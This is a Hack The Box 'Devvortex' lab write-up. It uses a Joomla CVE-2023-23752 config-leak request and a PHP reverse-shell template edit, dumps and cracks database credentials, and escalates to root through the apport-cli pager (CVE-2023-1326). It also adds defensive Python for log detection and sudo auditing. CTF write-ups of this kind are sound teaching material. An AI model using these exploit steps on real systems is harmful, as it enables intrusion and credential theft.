htb devvortex
Information Gathering
# Nmap 7.98 scan initiated Sat Dec 27 09:08:15 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.242
Nmap scan report for 10.10.11.242
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 15.115 days (since Fri Dec 12 06:22:47 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 27 09:08:31 2025 -- 1 IP address (1 host up) scanned in 15.48 seconds
Vulnerability Analysis
Since the pages are all static, look for virtual hosts.
➜ Devvortex ffuf -u http://devvortex.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -H 'Host: FUZZ.devvortex.htb' -t 100 -fs 154
dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 351ms]
Opening dev.devvortex.htb shows that it is static as well, so enumerate its subdirectories.
➜ Devvortex ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://dev.devvortex.htb/FUZZ -ic
images [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]
home [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 722ms]
media [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
templates [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
modules [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 363ms]
plugins [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 624ms]
includes [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 364ms]
language [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 341ms]
components [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 344ms]
api [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 420ms]
cache [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 412ms]
libraries [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 526ms]
tmp [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 416ms]
layouts [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 481ms]
administrator [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]
http://dev.devvortex.htb/administrator/ serves the Joomla Administrator Login page; searching for Joomla vulnerabilities turns up CVE-2023-23752.
The location of the version file can be found in the GitHub repository: https://github.com/joomla/joomla-cms/blob/5.4-dev/administrator/manifests/files/joomla.xml
http://dev.devvortex.htb/administrator/manifests/files/joomla.xml reports version 4.2.6, so [CVE-2023-23752](https://www.exploit-db.com/exploits/51334) can be used.
Exploitation (User Flag)
➜ Devvortex curl http://dev.devvortex.htb/api/index.php/v1/config/application\?public\=true -vv | jq
This yields the credentials lewis:P4ntherg0t1n5r3c0n##
We add a PHP reverse shell in System > Site Templates > Cassiopeia Details and Files > error.php.
ss -tlpn shows ports 3306 and 33060 listening, which indicates MySQL.
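For the defending side, the request above leaves a clear trace in the nginx access log. The following is an added example (not part of the original write-up) that flags requests setting `public` on the Joomla web-services API; the log lines are constructed, and the `/api/v1/` form without `index.php` is an assumption for sites that rewrite URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# nginx "combined" access-log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)')
# Joomla 4 web-services routes; the form without index.php is an assumption
# for sites that rewrite URLs.
API_RE = re.compile(r"^/api/(?:index\.php/)?v1/(?P<endpoint>.+)$")

# Constructed sample lines (documentation IP ranges), not taken from the box.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Dec/2025:09:20:01 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1968 "-" "curl/8.5.0"
203.0.113.7 - - [27/Dec/2025:09:20:09 +0000] "GET /api/index.php/v1/config/application?%70ublic=true HTTP/1.1" 200 1968 "-" "curl/8.5.0"
198.51.100.23 - - [27/Dec/2025:09:31:40 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 401 94 "-" "curl/8.5.0"
198.51.100.23 - - [27/Dec/2025:09:31:55 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 23221 "-" "Mozilla/5.0"
"""

def check_line(line):
    """Return a finding for a request that sets `public` on the Joomla API, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # Normalise before matching: nginx logs the raw, still-encoded request URI.
    path = re.sub(r"/{2,}", "/", unquote(url.path)).lower()
    api = API_RE.match(path)
    # parse_qs percent-decodes parameter names, so encoded keys are caught too.
    params = {k.lower() for k in parse_qs(url.query, keep_blank_values=True)}
    if not api or "public" not in params:
        return None
    status = int(m.group("status"))
    return {"ip": m.group("ip"), "time": m.group("ts"),
            "endpoint": api.group("endpoint"), "status": status,
            # 200 with a body: the endpoint answered this request with data
            "data_returned": status == 200 and int(m.group("size")) > 0}

def scan(log_text):
    """Return findings for every matching line of an access log."""
    return [f for f in map(check_line, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any hit with `data_returned` set means the configuration was served to that client, so the database password it contains should be rotated in addition to upgrading Joomla.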
www-data@devvortex:~/dev.devvortex.htb$ less configuration.php
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'lewis';
public $password = 'P4ntherg0t1n5r3c0n##';
Log in to the database with mysql -u lewis -p.
Enumerating the database gives:
| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
Cracking the hash gives the credentials logan:tequieromucho
Privilege Escalation (Root Flag)
logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
logan@devvortex:~$ sudo /usr/bin/apport-cli -v
2.20.11
Searching for this version turns up CVE-2023-1326.
logan@devvortex:~$ sudo /usr/bin/apport-cli -f
# Enter 2
# Enter 1 (or any option)
# Enter V
# Enter !/bin/bash
This gives root.
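The root cause here is a sudo rule that grants a program able to open a pager. The following added example (not part of the original write-up) audits `sudo -l` output for such rules; the `less`, `more` and `man` entries and the second rule line in the sample are illustrative additions, and the version bound comes from the CVE-2023-1326 description (apport-cli 2.26.0 and earlier).

```python
import re

# Programs that can hand the caller a pager or shell escape. apport-cli comes
# from this write-up; less, more and man are illustrative additions.
PAGER_CAPABLE = {"apport-cli", "less", "more", "man"}
# CVE-2023-1326 is described as affecting apport-cli 2.26.0 and earlier.
# Distro packages may backport the fix under an older upstream number, so a
# hit here means "check the package changelog", not "confirmed vulnerable".
APPORT_LAST_AFFECTED = (2, 26, 0)

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")
TAG_RE = re.compile(r"^(?:[A-Z_]+:\s*)+")  # NOPASSWD:, SETENV:, ...

# `sudo -l` output from the write-up plus one constructed rule line (the last).
SAMPLE = r"""Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
    (root) NOPASSWD: /usr/bin/tail -n 50 /var/log/syslog, /usr/bin/less /var/log/syslog
"""

def parse_sudo_l(text):
    """Return [(runas, command_path)] for every rule line in `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        # Split on commas that are not backslash-escaped inside arguments.
        for cmd in re.split(r"(?<!\\),", m.group("cmds")):
            cmd = TAG_RE.sub("", cmd.strip())
            if cmd:
                rules.append((m.group("runas").strip(), cmd.split()[0]))
    return rules

def audit(text, apport_version=None):
    """Flag sudo rules that grant a pager-capable program."""
    findings = []
    for runas, path in parse_sudo_l(text):
        name = path.rsplit("/", 1)[-1]
        if name not in PAGER_CAPABLE:
            continue
        note = "pager-capable program allowed via sudo"
        if name == "apport-cli" and apport_version:
            ver = tuple(int(p) for p in re.findall(r"\d+", apport_version)[:3])
            if ver <= APPORT_LAST_AFFECTED:
                note = "apport-cli %s is within the CVE-2023-1326 range" % apport_version
        findings.append({"command": path, "runas": runas, "note": note})
    return findings
```

Calling `audit(SAMPLE, "2.20.11")` reports the apport-cli rule from this box and the constructed `less` rule, and leaves the `tail` rule alone.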
Lessons Learned